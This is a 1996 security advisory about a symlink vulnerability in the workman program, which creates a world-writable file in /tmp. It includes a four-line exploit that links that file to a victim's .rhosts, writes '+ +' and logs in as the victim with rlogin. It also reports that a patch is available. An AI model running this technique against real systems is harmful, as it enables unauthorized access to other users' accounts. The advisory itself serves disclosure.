r00t advisory                                           [ workman       ]
                                                        [ Aug 25 1996   ]

-- Synposis
There exists a vunerability in workman that will allow any user to create
and write to files owned by the user who is running workman.  Workman creates
a mode 666 file in /tmp and will gladly follow a symbolic link to it's
target.

-- Exploitability
The exploit is absurdly simple:
$ ln -s /home/target_user/.rhosts /tmp/.wm_pid
# wait for target user to run workman
$ echo "+ +" >/home/target_user/.rhosts
$ rlogin -l localhost target_user

-- Fixes ?
The author of workman has been alerted to this problem and a patch is available
from ggal () ccs neu edu.

r00t -- http://www.r00t.org